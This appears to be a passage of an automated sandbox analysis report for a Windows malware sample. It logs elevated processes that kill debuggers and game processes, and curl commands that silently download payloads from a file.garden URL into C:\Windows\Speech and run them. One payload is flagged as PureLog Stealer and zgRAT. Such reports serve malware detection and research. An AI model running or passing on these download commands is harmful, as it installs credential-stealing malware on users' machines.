                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                                                    Start time:12:20:07
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im Dbg64.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                                                    Start time:12:20:10
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                                                                    Start time:12:20:10
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Speech\physmeme.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                                                                                                    File size:370'176 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                                                                    Start time:12:20:10
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                                                                    Start time:12:20:10
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                                                                    Start time:12:20:11
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                                                                    Start time:12:20:11
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                                                                    Start time:12:20:11
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff79fbb0000
                                                                                                                                                                                                                                                                                    File size:530'944 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                                                                    Start time:12:20:11
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im Dbg32.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                                                                    Start time:12:20:12
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 2084 -ip 2084
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d4a60000
                                                                                                                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                                                                                    Start time:12:20:13
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2084 -s 380
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d4a60000
                                                                                                                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                                                                                    Start time:12:20:13
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0xb10000
                                                                                                                                                                                                                                                                                    File size:65'440 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                                                                    Start time:12:20:14
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                                                                    Start time:12:20:15
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                                                                                                    Start time:12:20:15
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                                                                    Start time:12:20:15
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop HTTPDebuggerPro
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                                                                    Start time:12:20:16
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Speech\kdmapper.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0xec0000
                                                                                                                                                                                                                                                                                    File size:2'284'739 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                                                                    Start time:12:20:16
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                                                                    Start time:12:20:16
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff79fbb0000
                                                                                                                                                                                                                                                                                    File size:530'944 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                                                                    Start time:12:20:16
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                                                                    Start time:12:20:16
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                                                                    Start time:12:20:17
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                                                                    Start time:12:20:17
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                                                                                                    Start time:12:20:17
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                                                                                                                                                                                                                                                                    Imagebase:0xb80000
                                                                                                                                                                                                                                                                                    File size:147'456 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                                                                                                    Start time:12:20:18
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:62
                                                                                                                                                                                                                                                                                    Start time:12:20:18
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:63
                                                                                                                                                                                                                                                                                    Start time:12:20:19
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:64
                                                                                                                                                                                                                                                                                    Start time:12:20:19
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:65
                                                                                                                                                                                                                                                                                    Start time:12:20:19
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\Speech\rtcore64.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Speech\rtcore64.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x730000
                                                                                                                                                                                                                                                                                    File size:351'232 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:725EA12718261F13FB96AC192729A2A4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:66
                                                                                                                                                                                                                                                                                    Start time:12:20:19
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                                                                                                    Start time:12:20:19
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:68
                                                                                                                                                                                                                                                                                    Start time:12:20:19
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
